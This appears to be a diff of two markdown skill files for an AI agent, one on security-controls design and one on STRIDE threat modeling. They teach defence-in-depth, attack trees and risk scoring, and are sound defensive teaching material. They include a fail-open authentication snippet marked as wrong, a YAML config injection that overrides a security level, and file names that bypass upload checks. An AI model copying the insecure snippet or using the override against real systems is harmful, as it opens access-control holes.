action="DELETE_USER",
user_id=12345,
reason="GDPR erasure request",
requested_by=admin_id
)
# Second admin reviews and approves (cannot initiate)
reviewer.approve(admin_request, reviewer_id=different_admin_id)
# System executes after approval (automated, no single admin control)
if admin_request.is_approved():
execute_admin_action(admin_request)
```
**Principle**: **Break critical paths into multiple steps requiring different actors.**
## Control Verification Method
For **each control you design**, ask: **"What if this control fails?"**
### Verification Checklist
**For each control:**
1. **What attack does this prevent?** (threat it addresses)
2. **How can this control fail?** (failure modes)
3. **What happens if it fails?** (impact)
4. **What's the next layer of defense?** (backup control)
5. **Is failure logged/detected?** (observability)
### Example: API Token Validation
**Control**: Verify JWT signature before processing request
1. **What attack**: Prevents forged tokens, ensures authenticity
2. **How it can fail**:
- Public key unavailable (service down)
- Expired token not caught (clock skew)
- Token revocation list unavailable (Redis down)
- Signature algorithm downgrade attack (accept HS256 instead of RS256)
3. **What if it fails**:
- Public key unavailable → Fail-closed (deny all requests)
- Expired token → Layer 2: Check expiration explicitly
- Revocation list down → Layer 3: Apply strict rate limits as fallback
- Algorithm downgrade → Layer 4: Explicitly require RS256, reject others
4. **Next layer**:
- Authorization checks (even with valid token, check permissions)
- Rate limiting (limit damage from compromised token)
- Audit logging (detect unusual access patterns)
5. **Failure logged**: Yes → Log signature validation failures, alert on spike
**Outcome**: Designed 4 layers of defense against token attacks.
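A minimal sketch of those fail-closed token checks using the PyJWT library. The `Unauthorized` error matches the earlier examples in this skill; the revocation store and its `RevocationStoreUnavailable` exception are illustrative assumptions:
```python
import jwt  # PyJWT

def validate_token(token, public_key, revocation_store):
    try:
        # Pin the algorithm explicitly: rejects HS256/"none" downgrade attempts
        claims = jwt.decode(token, public_key, algorithms=["RS256"])
    except jwt.ExpiredSignatureError:
        raise Unauthorized("Token expired")
    except jwt.InvalidTokenError:
        raise Unauthorized("Invalid token")

    try:
        if revocation_store.is_revoked(claims.get("jti")):
            raise Unauthorized("Token revoked")
    except RevocationStoreUnavailable:
        # Fail-closed: cannot prove the token is still valid, so deny
        raise Unauthorized("Revocation check unavailable")
    return claims
```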
### Example: File Upload Validation
**Control**: Check file extension against allowlist
1. **What attack**: Prevents upload of executable files (.exe, .sh)
2. **How it can fail**:
- Attacker renames malware.exe → malware.jpg
- Double extension: malware.jpg.exe
- Case variation: malware.ExE
3. **What if it fails**: Malicious file stored, potentially executed
4. **Next layers**:
- Layer 2: Magic byte verification (check file content, not name)
- Layer 3: Antivirus scanning (detect known malware)
- Layer 4: File reprocessing (re-encode images, destroying embedded code)
- Layer 5: noexec mount (storage prevents execution)
- Layer 6: Separate domain for user content (CSP prevents XSS)
5. **Failure logged**: Yes → Log validation failures, rejected files
**Outcome**: Extension check is Layer 1 of 6. If bypassed, 5 more layers prevent exploitation.
## Quick Reference: Control Selection
**For every trust boundary, apply this checklist:**
| Layer | Control Type | Example |
|-------|--------------|---------|
| **1. Validation** | Input checking | Size limits, type validation, sanitization |
| **2. Authentication** | Identity verification | JWT validation, certificate checks, MFA |
| **3. Authorization** | Permission checks | RBAC, resource-level access, least privilege |
| **4. Rate Limiting** | Abuse prevention | Per-user limits, anomaly detection, quotas |
| **5. Audit Logging** | Detective | Security events, tamper-proof logs, alerting |
| **6. Encryption** | Confidentiality | TLS in transit, encryption at rest, key management |
**For each control:**
- Define fail-secure behavior (what happens if it fails?)
- Apply least privilege (minimum necessary access)
- Verify separation of duties (no single point of complete control)
- Test "what if this fails?" (ensure backup layers exist)
## Common Mistakes
### ❌ Designing Controls Before Identifying Boundaries
**Wrong**: "I need authentication and authorization and rate limiting"
**Right**: "Where are my trust boundaries? → Internet→API, API→Database → At each: apply layered controls"
**Why**: Controls are meaningless without knowing WHERE to apply them.
### ❌ Single Layer of Defense
**Wrong**: "Authentication is enough security"
**Right**: "Authentication + Authorization + Rate Limiting + Audit Logging"
**Why**: If authentication is bypassed (bug, misconfiguration), other layers provide defense.
### ❌ Fail-Open Defaults
**Wrong**:
```python
try:
user = auth_service.validate(token)
except ServiceUnavailable:
user = AnonymousUser() # Let them through
```
**Right**:
```python
try:
user = auth_service.validate(token)
except ServiceUnavailable:
raise Unauthorized("Auth service unavailable")
```
**Why**: Control failure should result in secure state (deny), not insecure state (allow).
### ❌ Excessive Privileges
**Wrong**: Grant web application full database access (SELECT, INSERT, UPDATE, DELETE on all tables)
**Right**: Grant only needed operations per table (SELECT on customers, INSERT-only on audit_logs)
**Why**: Minimizes damage from compromised application (SQL injection, stolen credentials).
### ❌ Single Point of Control
**Wrong**: One admin account can initiate, approve, and execute critical operations
**Right**: Separate accounts for initiate vs approve, require multi-signature
**Why**: Prevents single compromised account from complete system control.
### ❌ No Verification of "What If This Fails?"
**Wrong**: Design controls, assume they work
**Right**: For each control, ask "how can this fail?" and design backup layers
**Why**: Controls fail due to bugs, misconfigurations, attacks. Backup layers provide resilience.
## Cross-References
**Use BEFORE this skill**:
- `ordis/security-architect/threat-modeling` - Identify threats first, then design controls to address them
**Use WITH this skill**:
- `muna/technical-writer/documentation-structure` - Document control architecture as ADR
**Use AFTER this skill**:
- `ordis/security-architect/security-architecture-review` - Review controls for completeness
## Real-World Impact
**Well-designed controls using this methodology:**
- Multi-layered API authentication catching token forgery even when signature validation was bypassed (algorithm confusion attack)
- Database access controls limiting SQL injection damage to read-only operations (least privilege prevented data deletion)
- File upload defenses stopping malware despite extension check bypass (magic bytes + antivirus + reprocessing layers)
**Key lesson**: **Systematic application of defense-in-depth at trust boundaries is more effective than ad-hoc control selection.**

View File

@@ -0,0 +1,565 @@
# Threat Modeling
## Overview
Systematic identification of security threats using proven frameworks. Threat modeling finds threats that intuition misses by applying structured methodologies.
**Core Principle**: Security intuition finds obvious threats. Systematic threat modeling finds subtle, critical threats that lead to real vulnerabilities.
## When to Use
Load this skill when:
- Designing new systems or features (before implementation)
- Adding security-sensitive functionality (auth, data handling, APIs)
- Reviewing existing designs for security gaps
- Investigating security incidents (what else could be exploited?)
- User mentions: "threat model", "security risks", "what could go wrong", "attack surface"
**Use BEFORE implementation** - threats found after deployment are 10x more expensive to fix.
## Don't Use For
- **Implementing specific security controls** (use security-controls-design)
- **Code-level security patterns** (use secure-by-design-patterns)
- **Reviewing existing designs for completeness** (use security-architecture-review)
- **Compliance mapping** (use compliance-awareness-and-mapping)
- **Documenting threats after they're identified** (use documenting-threats-and-controls)
This skill is for IDENTIFYING threats systematically. Once threats are identified, route to appropriate skills for designing controls, implementing patterns, or documenting decisions.
## The STRIDE Framework
**STRIDE** is a systematic threat enumeration framework. Apply to EVERY component, interface, and data flow.
### S - Spoofing Identity
**Definition**: Attacker pretends to be someone/something else
**Questions to Ask**:
- Can attacker claim a different identity?
- Is authentication required? Can it be bypassed?
- Are credentials properly validated?
- Can tokens/sessions be stolen or forged?
**Example Threats**:
- Stolen authentication tokens
- Forged JWT signatures
- Session hijacking via XSS
- API key leakage in logs
### T - Tampering with Data
**Definition**: Unauthorized modification of data or code
**Questions to Ask**:
- Can attacker modify data in transit? (MITM)
- Can attacker modify data at rest? (database, files, config)
- Can attacker modify code? (supply chain, config injection)
- **Can configuration override security properties?** (CRITICAL - often missed)
**Example Threats**:
- Configuration files modifying security_level properties
- YAML/JSON injection overriding access controls
- Database tampering if encryption/MAC missing
- Code injection via deserialization
**⚠️ Property Override Pattern** (VULN-004):
```yaml
# Plugin declares security_level=UNOFFICIAL in code
# Attacker adds to YAML config:
plugins:
datasource:
security_level: SECRET # OVERRIDES code declaration!
```
Always ask: **"Can external configuration override security-critical properties?"**
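A minimal sketch of enforcing that answer at config-load time. Key names mirror the YAML example above; the loader and error type are illustrative assumptions:
```python
import yaml

FORBIDDEN_CONFIG_KEYS = {"security_level", "clearance", "role"}

class ConfigSecurityError(Exception):
    """Raised when external config attempts to set a security-critical property."""

def load_plugin_config(path):
    with open(path) as f:
        config = yaml.safe_load(f) or {}
    for plugin_name, settings in (config.get("plugins") or {}).items():
        overridden = FORBIDDEN_CONFIG_KEYS & set(settings or {})
        if overridden:
            # Fail-closed: reject the whole file rather than silently dropping keys
            raise ConfigSecurityError(
                f"Plugin '{plugin_name}' attempts to override {sorted(overridden)} via config"
            )
    return config
```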
### R - Repudiation
**Definition**: Attacker denies performing an action (no audit trail)
**Questions to Ask**:
- Are security-relevant actions logged?
- Can logs be tampered with or deleted?
- Is logging sufficient for forensics?
- Can attacker perform reconnaissance without detection?
**Example Threats**:
- No logging of failed authorization attempts
- Logs stored without integrity protection (MAC, signatures)
- Insufficient detail for incident response
- Log injection attacks
### I - Information Disclosure
**Definition**: Exposure of information to unauthorized parties
**Questions to Ask**:
- What data is exposed in responses, logs, errors?
- Can attacker enumerate resources or users?
- Are temporary files, caches, or memory properly cleared?
- Can attacker infer sensitive data from timing/behavior?
**Example Threats**:
- Secrets in error messages or stack traces
- Timing attacks revealing password validity
- Cache poisoning exposing other users' data
- Path traversal reading arbitrary files
### D - Denial of Service
**Definition**: Making system unavailable or degrading performance
**Questions to Ask**:
- Are there resource limits (CPU, memory, connections)?
- Can attacker trigger expensive operations?
- Is rate limiting implemented?
- Can attacker cause crashes or hangs?
**Example Threats**:
- Unbounded recursion or loops
- Memory exhaustion via large payloads
- Algorithmic complexity attacks (e.g., hash collisions)
- Crash via malformed input
### E - Elevation of Privilege
**Definition**: Gaining capabilities beyond what's authorized
**Questions to Ask**:
- Can attacker access admin functions?
- Can attacker escalate from low to high privilege?
- Are privilege checks performed at every layer?
- **Can type system be bypassed?** (ADR-004 pattern)
**Example Threats**:
- Missing authorization checks on sensitive endpoints
- Horizontal privilege escalation (access other users' data)
- Vertical privilege escalation (user → admin)
- Duck typing allowing security bypass
## Attack Tree Construction
**Purpose**: Visual/structured representation of attack paths from goal → exploitation
### Attack Tree Format
```
ROOT: Attacker Goal (e.g., "Access classified data")
├─ BRANCH 1: Attack Vector
│ ├─ LEAF: Specific Exploit (with feasibility)
│ └─ LEAF: Alternative Exploit
├─ BRANCH 2: Alternative Vector
│ └─ LEAF: Exploit Method
```
### Example: Configuration Override Attack (VULN-004)
```
ROOT: Access classified data with insufficient clearance
├─ Override Plugin Security Level
│ ├─ Inject security_level into YAML config ⭐ (VULN-004 - actually happened)
│ ├─ Modify plugin source code (requires code access)
│ └─ Bypass registry to register malicious plugin (ADR-003 gap)
├─ Exploit Trusted Downgrade
│ ├─ Compromise high-clearance component (supply chain)
│ └─ Abuse legitimate downgrade path (ADR-005 gap)
├─ Bypass Type System
│ └─ Duck-type plugin without BasePlugin inheritance (ADR-004 gap)
```
**⭐ = Easiest/highest risk path**
### How to Build Attack Trees
1. **Start with attacker goal**: What does attacker want? (data access, DoS, privilege escalation)
2. **Branch by attack vector**: How could they achieve it? (config, network, code)
3. **Leaf nodes are specific exploits**: Concrete technical steps
4. **Mark feasibility**: Easy, Medium, Hard (or Low/Med/High effort)
5. **Identify easiest path**: This is your highest priority to mitigate
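For larger trees it can help to capture the structure as data so the easiest path is computed rather than eyeballed. A minimal sketch (effort values are illustrative):
```python
# Leaves carry an effort score (1 = easy, 3 = hard); vectors group alternative exploits.
attack_tree = {
    "goal": "Access classified data with insufficient clearance",
    "vectors": [
        {"name": "Override plugin security level", "exploits": [
            {"name": "Inject security_level into YAML config", "effort": 1},
            {"name": "Modify plugin source code", "effort": 3},
        ]},
        {"name": "Bypass type system", "exploits": [
            {"name": "Duck-typed plugin without BasePlugin", "effort": 2},
        ]},
    ],
}

def easiest_path(tree):
    """Return (vector, exploit, effort) with the lowest effort: the first path to mitigate."""
    candidates = [
        (vector["name"], exploit["name"], exploit["effort"])
        for vector in tree["vectors"]
        for exploit in vector["exploits"]
    ]
    return min(candidates, key=lambda c: c[2])

print(easiest_path(attack_tree))
# ('Override plugin security level', 'Inject security_level into YAML config', 1)
```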
## Enforcement Gap Analysis
**Pattern**: Security properties must be enforced at EVERY layer. Single-layer enforcement fails.
### Layers to Check
**For any security property (e.g., security_level, access control, data classification):**
1. **Schema/Type Layer**: Is property type-safe? Can it be None/invalid?
2. **Registration Layer**: Is component registered? Can attacker bypass registry?
3. **Construction Layer**: Is property immutable after creation? Can it be modified?
4. **Runtime Layer**: Is property checked before sensitive operations?
5. **Post-Operation Layer**: Is result validated against expected property?
### Example: MLS Security Level Enforcement (ADR-002 → 005)
| Layer | Gap Found | Fix Required |
|-------|-----------|--------------|
| **Registry** | Plugin not registered at all (ADR-003) | Central plugin registry with runtime checks |
| **Type System** | Protocol allows duck typing bypass (ADR-004) | ABC with sealed methods, not Protocol |
| **Immutability** | security_level could be mutated (VULN-009) | Frozen dataclass + runtime checks |
| **Trust** | Trusted downgrade assumes no compromise (ADR-005) | Strict mode disables trusted downgrade |
**Key Insight**: Each gap was found AFTER implementation. Systematic enforcement gap analysis would have caught all four upfront.
### How to Apply
For each security property:
1. **List all layers** where property matters
2. **Ask per layer**: "Can attacker bypass this layer?"
3. **Design defense-in-depth**: Redundant checks at multiple layers
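A minimal sketch of what redundant checks could look like for a security_level property. The registry, level ordering, and `result.security_level` attribute are illustrative assumptions drawn from the examples in this skill:
```python
from abc import ABC, abstractmethod

LEVELS = ["UNOFFICIAL", "OFFICIAL", "SECRET"]  # illustrative ordering

def dominates(clearance, level):
    """True if clearance is at or above level."""
    return LEVELS.index(clearance) >= LEVELS.index(level)

class BasePlugin(ABC):
    """Nominal type: duck-typed look-alikes fail the isinstance check below."""
    security_level = "UNOFFICIAL"
    @abstractmethod
    def run(self): ...

REGISTERED_PLUGINS = {}  # name -> plugin instance, populated at registration time

def execute_plugin(name, requested_level, clearance):
    # Layer 1: registration (unregistered components never run)
    plugin = REGISTERED_PLUGINS.get(name)
    if plugin is None:
        raise PermissionError(f"Plugin '{name}' is not registered")
    # Layer 2: nominal typing (rejects Protocol/duck-typing bypass)
    if not isinstance(plugin, BasePlugin):
        raise PermissionError(f"Plugin '{name}' does not derive from BasePlugin")
    # Layer 3: runtime check before the sensitive operation
    if not dominates(clearance, plugin.security_level):
        raise PermissionError("Insufficient clearance for this plugin")
    result = plugin.run()
    # Layer 4: post-operation check (result must not exceed the requested level)
    if not dominates(requested_level, result.security_level):
        raise PermissionError("Plugin returned data above the requested level")
    return result
```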
## Risk Scoring
**Purpose**: Prioritize threats by (Likelihood × Impact)
### Likelihood Scale
| Score | Likelihood | Criteria |
|-------|-----------|----------|
| **3** | High | Easy to exploit, attacker has means and motive, no special access needed |
| **2** | Medium | Requires some skill or access, exploit path exists but not trivial |
| **1** | Low | Requires significant expertise, insider access, or rare conditions |
### Impact Scale
| Score | Impact | Criteria |
|-------|--------|----------|
| **3** | High | Complete system compromise, data breach, financial loss, safety risk |
| **2** | Medium | Partial compromise, limited data exposure, service degradation |
| **1** | Low | Minor information leakage, temporary DoS, limited scope |
### Risk Matrix
```
IMPACT
1 2 3
┌───┬───┬───┐
3 │ M │ H │ C │ C = Critical (fix immediately)
L 2 │ L │ M │ H │ H = High (fix before launch)
I 1 │ L │ L │ M │ M = Medium (fix soon)
K └───┴───┴───┘ L = Low (fix if time permits)
```
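The same matrix as a trivial helper (a sketch; thresholds mirror the legend above):
```python
def risk_category(likelihood, impact):
    """Map Likelihood (1-3) x Impact (1-3) to the matrix categories above."""
    score = likelihood * impact
    if score >= 9:
        return "Critical"   # fix immediately
    if score >= 6:
        return "High"       # fix before launch
    if score >= 3:
        return "Medium"     # fix soon
    return "Low"            # fix if time permits

assert risk_category(3, 3) == "Critical"   # e.g. VULN-004 below
assert risk_category(2, 3) == "High"       # e.g. ADR-004 below
```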
### Example: VULN-004 Config Override
- **Likelihood**: 3 (High) - YAML files easily modified with filesystem access
- **Impact**: 3 (High) - Bypass MLS enforcement, access classified data
- **Risk Score**: 9 (Critical) - **Fix immediately**
### Example: ADR-004 Type System Bypass
- **Likelihood**: 2 (Medium) - Requires knowing to create duck-typed plugin
- **Impact**: 3 (High) - Complete security bypass
- **Risk Score**: 6 (High) - **Fix before launch**
## Threat Modeling Workflow
### Step 1: System Decomposition
Break system into components:
1. **Entry points**: APIs, file uploads, configuration, user input
2. **Data stores**: Databases, caches, logs, files
3. **External dependencies**: Third-party APIs, libraries, services
4. **Trust boundaries**: Where privilege level changes, network boundaries
5. **Security-critical components**: Auth, access control, crypto, secrets management
### Step 2: Apply STRIDE per Component
For EACH component/interface, systematically ask STRIDE questions:
**Example: Plugin Configuration Component**
| STRIDE | Threat Found | Priority |
|--------|-------------|----------|
| **S** | None (no identity claims) | - |
| **T** | Config tampering to override security_level (VULN-004) | Critical |
| **R** | Config changes not logged | Medium |
| **I** | Config may contain secrets in plaintext | High |
| **D** | Malformed YAML causes parser crash | Low |
| **E** | Config override elevates plugin privilege | Critical |
### Step 3: Build Attack Trees
For each high-priority threat, construct attack tree:
- Goal: What does attacker want?
- Vectors: How could they get it?
- Exploits: Specific technical steps
Mark easiest paths with ⭐.
### Step 4: Check Enforcement Gaps
For each security property (authentication, authorization, encryption):
1. List enforcement layers (schema, registry, runtime, etc.)
2. Check each layer for gaps
3. Design redundant checks (defense-in-depth)
### Step 5: Score and Prioritize
- Calculate Likelihood × Impact for each threat
- Sort by risk score (highest first)
- Set mitigation deadlines (Critical → immediate, High → before launch)
### Step 6: Document Threats
Create threat model document:
```markdown
# Threat Model: [System Name]
## Scope
[Components, entry points, trust boundaries]
## Threats Identified
### THREAT-001: Configuration Override Attack (CRITICAL)
**STRIDE**: Tampering, Elevation of Privilege
**Attack Tree**: [Include tree diagram or text description]
**Risk Score**: 9 (L:3 × I:3)
**Mitigation**: Forbid security_level in config (schema), runtime verification, frozen dataclass
### THREAT-002: [Next threat...]
## Enforcement Gaps
[List gaps found in defense-in-depth analysis]
## Risk Matrix
[Include prioritized threat list]
```
## Common Patterns That Intuition Misses
### Pattern 1: Property Override via Configuration
**Symptom**: Security property declared in code, but configuration system allows overriding it
**Example**: VULN-004 - Plugin declares security_level in code, YAML config overrides it
**How to Spot**:
- Code declares security property (access_level, security_level, role)
- Configuration system loads external data (YAML, JSON, database)
- No explicit check that config cannot override security properties
**Mitigation**: Schema MUST forbid security properties in config, runtime verification
### Pattern 2: Enforcement at One Layer Only
**Symptom**: Security check at one layer, but attacker can bypass that layer
**Example**: ADR-003 - MLS checks assume plugin is registered, but no check that plugin IS registered
**How to Spot**:
- Security check at schema/type layer but not runtime
- Trust in single source of truth (registry, type system) without verification
- No redundant checks
**Mitigation**: Defense-in-depth - check at schema, registry, runtime, post-operation
### Pattern 3: Type System as Security Boundary
**Symptom**: Relying on type system (Protocol, interface) for security enforcement
**Example**: ADR-004 - Protocol typing allows duck typing to bypass BasePlugin
**How to Spot**:
- Security property defined in Protocol or interface
- No nominal type enforcement (isinstance check, ABC)
- Runtime doesn't verify actual type, just duck typing compatibility
**Mitigation**: Use ABC with sealed methods, runtime isinstance checks
### Pattern 4: Trusted Component Assumptions
**Symptom**: Assuming high-privilege component will never be compromised
**Example**: ADR-005 - Trusted downgrade assumes high-clearance component is always safe
**How to Spot**:
- Component granted special privileges ("trusted")
- No monitoring or verification of trusted component behavior
- Insider threat or supply chain compromise not in threat model
**Mitigation**: Trust but verify - log all actions, anomaly detection, strict mode without trust
### Pattern 5: Immutability Assumption
**Symptom**: Assuming language feature (frozen, const, final) provides security
**Example**: VULN-009 - Frozen dataclass but __dict__ bypass possible
**How to Spot**:
- Security property marked frozen/immutable via language feature
- No runtime check that property hasn't changed
- Language feature has known bypasses (__dict__, __setattr__)
**Mitigation**: Language feature + runtime verification + test all bypass methods
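A minimal sketch of testing those bypasses on a frozen dataclass (pytest-style; the field names mirror the examples in this skill):
```python
from dataclasses import dataclass, FrozenInstanceError
import pytest

@dataclass(frozen=True)
class PluginDescriptor:
    name: str
    security_level: str

def test_normal_mutation_is_blocked():
    p = PluginDescriptor("datasource", "UNOFFICIAL")
    with pytest.raises(FrozenInstanceError):
        p.security_level = "SECRET"

def test_known_bypasses_still_work():
    p = PluginDescriptor("datasource", "UNOFFICIAL")
    # object.__setattr__ (and direct __dict__ writes) bypass frozen=True
    object.__setattr__(p, "security_level", "SECRET")
    assert p.security_level == "SECRET"
    # Conclusion: the language feature alone is insufficient; pair it with a
    # runtime re-verification (e.g. re-check against the registry) before use.
```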
## Quick Reference Checklist
**Use this checklist for every threat modeling session:**
### Pre-Session
- [ ] Identify scope (components, entry points, trust boundaries)
- [ ] Gather architecture diagrams, API specs, data flow diagrams
### STRIDE Application
- [ ] Apply S.T.R.I.D.E to EVERY component/interface
- [ ] Document threats found per category
- [ ] Check for property override patterns
- [ ] Check for enforcement gap patterns
### Attack Trees
- [ ] Build attack tree for each high-priority threat
- [ ] Mark easiest exploitation paths
- [ ] Identify pre-requisites (what attacker needs)
### Risk Scoring
- [ ] Score Likelihood (1-3) for each threat
- [ ] Score Impact (1-3) for each threat
- [ ] Calculate Risk = L × I
- [ ] Prioritize by risk score
### Enforcement Gaps
- [ ] List security properties (auth, authorization, encryption, etc.)
- [ ] For each property, check: Schema? Registry? Runtime? Post-op?
- [ ] Identify gaps in defense-in-depth
### Documentation
- [ ] Create threat model document
- [ ] Include attack trees, risk matrix, mitigation plans
- [ ] Share with team for review
## Common Mistakes
### ❌ Intuitive Threat Finding Only
**Wrong**: "I'll just think about what could go wrong"
**Right**: Systematically apply STRIDE to every component
**Why**: Intuition finds obvious threats. STRIDE finds subtle, critical threats like VULN-004.
### ❌ Threat Modeling After Implementation
**Wrong**: "Let's build it first, then threat model"
**Right**: Threat model BEFORE implementation
**Why**: Threats found post-implementation require expensive re-architecture. Threats found in design are cheap to fix.
### ❌ Single-Layer Validation
**Wrong**: "Schema validates config, so it's secure"
**Right**: Validate at schema, registry, runtime, post-operation
**Why**: Attackers bypass single layers. Defense-in-depth catches them.
### ❌ Trusting Language Features for Security
**Wrong**: "It's frozen=True, so it can't be modified"
**Right**: Language feature + runtime verification + test bypass methods
**Why**: Language features have bypasses (VULN-009). Always verify.
### ❌ Skipping Risk Scoring
**Wrong**: "All threats are important, fix them all"
**Right**: Score L×I, prioritize Critical/High, fix Low only if time permits
**Why**: Resources are limited. Critical threats must be fixed first.
## Real-World Examples
### Example 1: VULN-004 - Configuration Override Attack
**System**: Plugin system with YAML configuration and MLS security levels
**STRIDE Analysis**:
- **T** (Tampering): Config file tampering ✓
- **E** (Elevation): Override security_level property ✓ **← Caught by STRIDE**
**Attack Tree**:
```
Goal: Access classified data
└─ Override security_level to SECRET
├─ Inject security_level: SECRET into YAML ⭐ (easiest)
├─ Modify source code (harder)
└─ Compromise plugin registry (harder)
```
**Risk Score**: L:3 × I:3 = 9 (Critical)
**Mitigation**: Forbid security_level in config schema + runtime verification
### Example 2: ADR-002 → 005 - MLS Design Gaps
**System**: Multi-Level Security enforcement for plugins
**Enforcement Gap Analysis**:
1. **Registry Layer**: No check plugin is registered (ADR-003) ✓
2. **Type Layer**: Protocol allows duck typing (ADR-004) ✓
3. **Immutability**: security_level could be mutated (VULN-009) ✓
4. **Trust**: Trusted downgrade assumes no compromise (ADR-005) ✓
**All four gaps found by systematic enforcement analysis** - would have prevented 3 follow-up ADRs.
**Risk Scores**:
- ADR-003 (registry): L:2 × I:3 = 6 (High)
- ADR-004 (type): L:2 × I:3 = 6 (High)
- ADR-005 (trust): L:1 × I:3 = 3 (Medium)
## When NOT to Threat Model
**Don't threat model for**:
- Non-security features (UI styling, analytics dashboards with no sensitive data)
- Changes that don't touch attack surface (refactoring internal code, renaming variables)
- Systems with no sensitive data and no attack value (internal dev tools, prototypes)
**Quick test**: If attacker can't gain anything (data, money, access, disruption), threat modeling may be overkill.
## Cross-References
### Load These Skills Together
**For comprehensive security**:
- `ordis/security-architect/threat-modeling` (this skill) - Find threats
- `ordis/security-architect/security-controls-design` - Design mitigations
- `ordis/security-architect/secure-by-design-patterns` - Prevent threats at architecture level
**For documentation**:
- `ordis/security-architect/documenting-threats-and-controls` - Document threat model
- `muna/technical-writer/documentation-structure` - Structure threat docs as ADRs
## Summary
**Threat modeling IS systematic threat discovery using STRIDE, attack trees, and risk scoring.**
**Key Principles**:
1. **STRIDE every component** - systematic beats intuition
2. **Build attack trees** - find easiest exploitation paths
3. **Check enforcement gaps** - defense-in-depth at every layer
4. **Score risks** - L × I prioritization
5. **Do it early** - before implementation, when fixes are cheap
**Meta-rule**: If you're designing something security-sensitive and you haven't threat modeled it, you've missed critical threats. Always threat model first.